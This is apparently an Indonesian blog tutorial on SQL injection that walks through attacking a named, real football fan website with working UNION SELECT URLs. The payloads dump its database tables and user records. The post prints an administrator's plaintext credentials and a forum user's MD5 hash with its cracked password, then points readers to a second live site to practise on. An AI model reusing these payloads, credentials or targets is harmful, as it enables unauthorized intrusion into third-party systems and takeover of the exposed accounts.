SQL Injection?

Tuesday, May 31, 2016

SQL Injection?

Pertama-tama anda searching di om google  kayak gini:
Inurl:”.php?id=”
Muncul  beberapa link langsung aja buka satu satu kali ini saya akan meng injeksi salah satu web di web itu juga ada forumnya ini alamatnya:
terus kita coba ada bugsnya gak kasih tanda kutip dibelakang angaka 33
jadi :
oke !, setelah dikasih tanda kutip web berubah sebagian isinya hilang, perlu anda ketahui ada sebagian web langsung mengularkan pesan error  , jadi intinya sama aja.
Next  sekarang kita coba tambah kan perintah
perintah ini untuk mengecek jumlah field di database dengan group yang sejenis saya kasih angka 100, karena saya yakin tidak field yang lebih dari seratus!,  nah kalau dikasih angka 100 tidak mau masih eror maka turunin angkanya.
Ujicoba di web ini seperti berikut ini:
nah diatas 6 masih juga muncul error , artinya field tidak lebih dari 6 field , Oke next kita inject d engan perintah union , yang fungsinya untuk melihat table lain yang dengan table tertentu kira2 seperti itu yang pernah say abaca kalau salah maaf  Ya..
coba lihat dibagian header muncul angka 6 , lewat angka 6 inilah kita akan memasukan perintah Version(), user(), pertama kita chek apakah php ini versi 5 keatas atau 4 , kalau versi 4 maka lebih baik cari web yang lain he…he..
wowww… muncul tuch versi phpnya
versi : 5.0.27
next chek usernya:
http://www.footballderbies.com/fans/index.php?id=-33+UNION+SELECT+1,2,3,4,5,user()–
User db:   footballderbies@localhost
Asyik semakin nyata kalau web ini bisa di inject dengan sql Oke  kita teruskan jalan-jalanya, sekarang kita lihat ada berapa table yang ada didatabase :
http://www.footballderbies.com/fans/index.php?id=-33+UNION+SELECT+1,2,3,4,5,group_concat(table_name)+FROM+information_schema.tables+where+table_schema=database()–
ha….ha…. banyak ya…. Tapi ambil aja table dengan nama : login_users,
kita coba cari tahu kolom apa aja yang ada di table login_user; ini perintahnya
lihat link diatas pada bagian ujung ada seperi bilangan heksa mungkin ada yang Tanya dari mana angka itu?, Yups angka itu dihasilkan dari conver table login_user ke Heksa, jadi table yang  akan kita cari tahu nama kolomnya mula-mula di ubah ke heksa , jangan pusing gimana cara ngubahnya ini dia Linkny:
Oke kita lanjut kelangkah selanjutnya nah saat nya kita mengambil nilai ditiap kolomnya  seprti
id,username,password, full_control
yang kita dapat dari table login_user coba kita masukan dikolom group_concat nya jadi seperti ini:
http://www.footballderbies.com/fans/index.php?id=-33+UNION+SELECT+1,2,3,4,5,group_concat(id,’User ‘,username,’paswd ‘,password,’Hak_akses’,full_control)+FROM+login_users–
Yups ..link diatas sedikit saya modifikasi , dengan manambahkan string User, paswd dan hak akses  yang diapit kutip satu dan tujuan nya biar bacanya enggak ribet ada pemisah. Ha… ha…
Kalau udah monggo di ente apa yang terjaldi?, muncul lah apa yang kita mau.. !
Dan lihat field kolom 1 dengan akses control 1, wah ini pasti sang admin yang males.. he,,,,he… seperti brikut ini:
No  userna
NoUsernamePasswordHak akses
1jordyKudel11
Lihat passwordnya sama sekali tidak di encrypt ….!, oke nah tugas anda sekarang cari halaman loginya terus login dech,
Kenapa saya menyuruh karena saya tidak metemu halaman loginnya he… he…. , ketumunya halaman  login forumnya ,  langkahnya hamper sama kita conver t nama table phpbb_users , caranya sama kayak diatas sampe anda dapatkan user di forum itu, ?
Oke saya angap anda sudah pada bisa contoh saya akan masuk dengan salah satu user yang saya dapatkan:
No_fieldStatus OlusernamePassword
211Nobelhopper20cf6628597a66ecc9de05d875dc87bb
Masalahnya Tuch password nya di encrypt dengan Md5, kenapa saya tahu yup emang standar yang dipake seperti itu, silahkan decrypt passwordnya tinggal searching di google , tapi bagi anda yang males nih link untuk mendecrypt Md5:
nah dari hasil decrypt saya dapatkan dengan User login sbb:
Username:  Nobelhopper
Password:    210597ge
Oke sobat itulah sekilas sql injection , dan jika sobat mau nyoba silahkan uji wb ini:
Tapi saya mohon jangan di acak2nya ya, karena tutorial ini saya buat hanya sekedar pengetahuan agar kita lebih hati2 dan waspada terhadap segala kemungkinan: ini linknya:
http://www.itmaasia.com/news.php?id=1

{ 0 comments... read them below or add one }

Post a Comment